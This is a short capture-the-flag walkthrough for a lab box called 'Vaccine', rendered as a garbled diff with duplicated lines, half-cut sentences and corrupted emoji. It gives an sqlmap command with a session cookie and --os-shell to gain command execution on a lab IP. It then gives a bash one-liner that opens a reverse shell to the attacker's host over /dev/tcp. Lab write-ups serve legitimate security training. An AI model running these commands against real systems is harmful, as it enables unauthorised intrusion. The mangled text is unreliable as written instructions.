Vaccine Walkthrough

 There are 2 main ways to get user shell in this box.

-• Using SQLMap --os-shell command.
+- Using SQLMap

-• Enumerating all the tables.
+command. - Enumerating all the tables.

-Here I will show the 1st step: We could use the SQLMap flag --os-shell to gain a shell and after that gain an upgraded reverse shell with the next commands.
+to gain a shell and after that gain an upgraded reverse shell with the next commands.
 However I lost the connection sometimes with this method.
 Anyway first try it out.
 It's very simple, type bellow command on your terminal.

 sqlmap http://10.10.10.46/dashboard.php?search=* --cookie PHPSESSID=3gl7g1ujsq2i3cpigk4521lk8p --os-shell --batch

-Now, time to upgrade that ugly shell. πŸŽ…πŸŽ… Start netcat listener on whatever port you like (In this case it's 4848) and run below command on os-shell.πŸ‘‡
+Start netcat listener on whatever port you like (In this case it's 4848) and run below command on os-shell.π

 bash -c 'bash -i &>/dev/tcp/<YourIP>/4848 <&1' &